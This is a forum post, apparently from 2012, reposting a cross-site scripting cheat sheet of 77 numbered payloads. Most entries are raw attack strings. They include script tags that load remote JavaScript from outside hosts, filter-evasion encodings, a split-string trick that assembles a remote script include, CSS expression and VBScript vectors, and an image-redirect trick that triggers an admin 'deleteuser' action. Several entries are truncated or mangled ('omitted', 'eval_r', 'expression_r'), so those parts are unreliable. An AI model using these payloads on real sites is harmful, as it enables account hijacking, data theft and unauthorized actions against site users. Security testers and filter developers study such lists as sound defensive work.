XSS cross-site scripting attack roundup

OP | Posted on 2012-9-5 14:56:34
It seems t00ls has relatively little material on XSS, so when I saw something good I copied it over; maybe some of you want to mark it.

(1) Plain XSS JavaScript injection
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(2) IMG tag XSS using a JavaScript command
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(3) IMG tag, no semicolon, no quotes
<IMG SRC=javascript:alert('XSS')>

(4) IMG tag, case-insensitive
<IMG SRC=JaVaScRiPt:alert('XSS')>

(5) HTML encoding (semicolons required)
<IMG SRC=javascript:alert("XSS")>

(6) Malformed IMG tag, repaired
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">

(7) fromCharCode tag (calculator)
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

(8) UTF-8 Unicode encoding (calculator)
<IMG SRC=jav..omitted..S')>

(9) 7-bit UTF-8 Unicode encoding, without semicolons (calculator)
<IMG SRC=jav..omitted..S')>

(10) Hex encoding, also without semicolons (calculator)
<IMG SRC=&#x6A&#x61&#x76&#x61..omitted..&#x58&#x53&#x53&#x27&#x29>

(11) Embedded tag, splitting the JavaScript
<IMG SRC="jav ascript:alert('XSS');">

(12) Embedded encoded tag, splitting the JavaScript
<IMG SRC="jav ascript:alert('XSS');">

(13) Embedded newline
<IMG SRC="jav ascript:alert('XSS');">

(14) Embedded carriage return
<IMG SRC="jav ascript:alert('XSS');">

(15) Embedded multi-line JavaScript injection, an extreme XSS example
<IMG SRC="javascript:alert('XSS')">

(16) Getting around a character limit (requires being on the same page)
<script>z='document.'</script>
<script>z=z+'write("'</script>
<script>z=z+'<script'</script>
<script>z=z+' src=ht'</script>
<script>z=z+'tp://ww'</script>
<script>z=z+'w.shell'</script>
<script>z=z+'.net/1.'</script>
<script>z=z+'js></sc'</script>
<script>z=z+'ript>")'</script>
<script>eval_r(z)</script>

(17) Null character
perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out

(18) Null character 2; null characters are basically ineffective here in China, because there is nowhere to make use of them
perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out

(19) Spaces and meta before the IMG tag
<IMG SRC="   javascript:alert('XSS');">

(20) Non-alpha-non-digit XSS
<SCRIPT/XSS SRC="http://3w.org/XSS/xss.js"></SCRIPT>

(21) Non-alpha-non-digit XSS to 2
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>

(22) Non-alpha-non-digit XSS to 3
<SCRIPT/SRC="http://3w.org/XSS/xss.js"></SCRIPT>

(23) Double open brackets
<<SCRIPT>alert("XSS");//<</SCRIPT>

(24) No closing script tag (Firefox and similar browsers only)
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>

(25) No closing script tag 2
<SCRIPT SRC=//3w.org/XSS/xss.js>

(26) Half-open HTML/JavaScript XSS
<IMG SRC="javascript:alert('XSS')"

(27) Double open angle brackets
<iframe src=http://3w.org/XSS.html <

(28) No single quotes, double quotes or semicolons
<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>

(29) Escaping filtered JavaScript
\";alert('XSS');//

(30) Closing the TITLE tag
</TITLE><SCRIPT>alert("XSS");</SCRIPT>

(31) Input Image
<INPUT SRC="javascript:alert('XSS');">

(32) BODY Image
<BODY BACKGROUND="javascript:alert('XSS')">

(33) BODY tag
<BODY('XSS')>

(34) IMG Dynsrc
<IMG DYNSRC="javascript:alert('XSS')">

(35) IMG Lowsrc
<IMG LOWSRC="javascript:alert('XSS')">

(36) BGSOUND
<BGSOUND SRC="javascript:alert('XSS');">

(37) STYLE sheet
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">

(38) Remote stylesheet
<LINK REL="stylesheet" HREF="http://3w.org/xss.css">

(39) List-style-image (list style)
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS

(40) IMG VBscript
<IMG SRC='vbscript:msgbox("XSS")'></STYLE><UL><LI>XSS

(41) META link URL
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">

(42) Iframe
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>

(43) Frame
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>

(44) Table
<TABLE BACKGROUND="javascript:alert('XSS')">

(45) TD
<TABLE><TD BACKGROUND="javascript:alert('XSS')">

(46) DIV background-image
<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(47) DIV background-image with extra characters added (1-32&34&39&160&8192-8&13&12288&65279)
<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(48) DIV expression
<DIV STYLE="width: expression_r(alert('XSS'));">

(49) STYLE attribute with split expression
<IMG STYLE="xss:expression_r(alert('XSS'))">

(50) Anonymous STYLE tag (made of an open angle bracket followed by a letter)
<XSS STYLE="xss:expression_r(alert('XSS'))">

(51) STYLE background-image
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>

(52) IMG STYLE method
exppression(alert("XSS"))'>

(53) STYLE background
<STYLE><STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>

(54) BASE
<BASE HREF="javascript:alert('XSS');//">

(55) EMBED tag; you can embed a Flash file that contains the XSS
<EMBED SRC="http://3w.org/XSS/xss.swf" ></EMBED>

(56) Using ActionScript inside Flash, you can smuggle your XSS code in
a="get";
b="URL(\"";
c="javascript:";
d="alert('XSS');\")";
eval_r(a+b+c+d);

(57) XML namespace. The HTC file must be on the same server as your XSS carrier
<HTML xmlns:xss>
<?import namespace="xss" implementation="http://3w.org/XSS/xss.htc">
<xss:xss>XSS</xss:xss>
</HTML>

(58) If your JS is filtered, you can put the JS code inside an image and use that
<SCRIPT SRC=""></SCRIPT>

(59) IMG embedded command; can execute arbitrary commands
<IMG SRC="http://www.XXX.com/a.php?a=b">

(60) IMG embedded command (a.jpg on the same server)
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser

(61) Bypassing symbol filters
<SCRIPT a=">" SRC="http://3w.org/xss.js"></SCRIPT>

(62)
<SCRIPT =">" SRC="http://3w.org/xss.js"></SCRIPT>

(63)
<SCRIPT a=">" " SRC="http://3w.org/xss.js"></SCRIPT>

(64)
<SCRIPT "a='>'" SRC="http://3w.org/xss.js"></SCRIPT>

(65)
<SCRIPT a=`>` SRC="http://3w.org/xss.js"></SCRIPT>

(66)
<SCRIPT a=">'>" SRC="http://3w.org/xss.js"></SCRIPT>

(67)
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://3w.org/xss.js"></SCRIPT>

(68) URL bypass
<A HREF="http://127.0.0.1/">XSS</A>

(69) URL encoding
<A HREF="http://3w.org">XSS</A>

(70) IP in decimal
<A HREF="http://3232235521">XSS</A>

(71) IP in hex
<A HREF="http://0xc0.0xa8.0x00.0x01">XSS</A>

(72) IP in octal
<A HREF="http://0300.0250.0000.0001">XSS</A>

(73) Mixed encoding
<A HREF="h
tt p://6 6.000146.0x7.147/">XSS</A>

(74) Omitting [http:]
<A HREF="//www.google.com/">XSS</A>

(75) Omitting [www]
<A HREF="http://google.com/">XSS</A>

(76) Absolute dot, absolute DNS
<A HREF="http://www.google.com./">XSS</A>

(77) javascript link
<A HREF="javascript:document.location='http://www.google.com/'">XSS</A>